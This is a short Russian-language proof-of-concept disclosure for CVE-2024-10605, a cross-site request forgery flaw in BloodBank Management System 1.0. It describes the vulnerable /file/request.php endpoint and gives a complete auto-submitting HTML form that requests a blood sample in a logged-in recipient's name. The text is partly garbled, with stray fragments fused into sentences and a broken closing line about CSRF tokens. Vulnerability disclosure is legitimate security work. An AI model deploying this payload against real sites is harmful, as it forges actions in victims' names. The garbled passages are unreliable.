
Концепт-доказательство для CVE-2024-10605, уязвимости CSRF в BloodBank Management System 1.0, позволяющей несанкционированные запросы образцов крови.
file/request.phpСуществует уязвимость межсайтовой подделки запроса (Cross Site Request Forgery) на этом эндпоинте /file/request.php, которая позволяет удаленному пользователю инициировать запрос образца крови от имени авторизованного из доступных образцов крови выбранной больницы.
получателяУспешная эксплуатация может привести к несанкционированным действиям от имени жертвы. Кроме того, это может быть использовано при посещении вредоносных веб-сайтов с полезной нагрузкой.
Ниже приведен пример CSRF PoC-атаки, которая инициирует запрос образца крови от имени авторизованного получателя:
<html>
<head>
<title>CSRF PoC</title>
</head>
<body>
<form action="http://localhost.local/bloodbank/file/request.php" method="POST" enctype="application/x-www-form-urlencoded">
<input name="bid" value="16">
<input name="hid" value="3">
<input name="bg" value="B-">
<input name="request" value="Request+Sample">
</form>
<script>
document.querySelector("form").submit();
</script>
</body>
</html>
csrf tokens в ваш запрос.